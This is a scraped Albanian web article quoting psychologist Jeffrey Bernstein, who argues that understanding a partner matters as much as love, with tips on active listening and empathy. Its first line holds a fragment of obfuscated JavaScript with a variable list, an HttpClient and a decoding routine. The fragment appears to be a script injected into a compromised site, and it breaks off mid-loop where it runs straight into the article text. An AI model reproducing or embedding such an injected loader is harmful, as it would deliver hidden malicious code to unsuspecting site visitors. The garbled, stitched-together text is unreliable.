;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Cila është gjëja më e rëndësishme për një lidhje të lumtur?

By

Dashuria është baza e çdo marrëdhënieje, por ka një kusht tjetër shumë të rëndësishëm për një marrëdhënie të shëndetshme dhe të lumtur, thotë psikologu Jeffrey Bernstein.

“Të kuptosh partnerin është ajo që ka vërtet rëndësi në një marrëdhënie. Të kuptosh emocionet, dëshirat dhe zhgënjimet e partnerit është po aq e rëndësishme, nëse jo më e rëndësishme, sesa vetë dashuria”, shpjegoi ai për Psychology Today.

Empatia dhe mirëkuptimi mundësojnë lidhjen e sinqertë mes partnerëve. Kur kuptojmë mendimet dhe emocionet e partnerit tonë, ne vërtetojmë përvojat e tij dhe krijojmë një mjedis të sigurt që inkurajon intimitet dhe komunikim më të thellë, shkruan Index.hr, transmeton Klankosova.tv.

“Kërkimet konfirmojnë fuqinë e të kuptuarit në marrëdhënie. Çiftet që praktikojnë dëgjimin aktiv dhe komunikimin empatik raportojnë kënaqësi më të madhe në marrëdhënie. Empatia dhe mirëkuptimi janë treguesit më të fortë të suksesit afatgjatë në marrëdhënie, duke theksuar se mirëkuptimi është themeli i dashurisë së qëndrueshme”, thekson psikologu.

 Ai ndau disa këshilla për të kuptuar më mirë partnerin tuaj, të cilat përfshijnë:

Praktikoni dëgjimin aktiv

Bëni pyetje të hapura

Vendoseni veten në situatën e tyre

Komunikoni me dhembshuri

Jini të durueshëm dhe këmbëngulës.

Artikuj të ngjashëm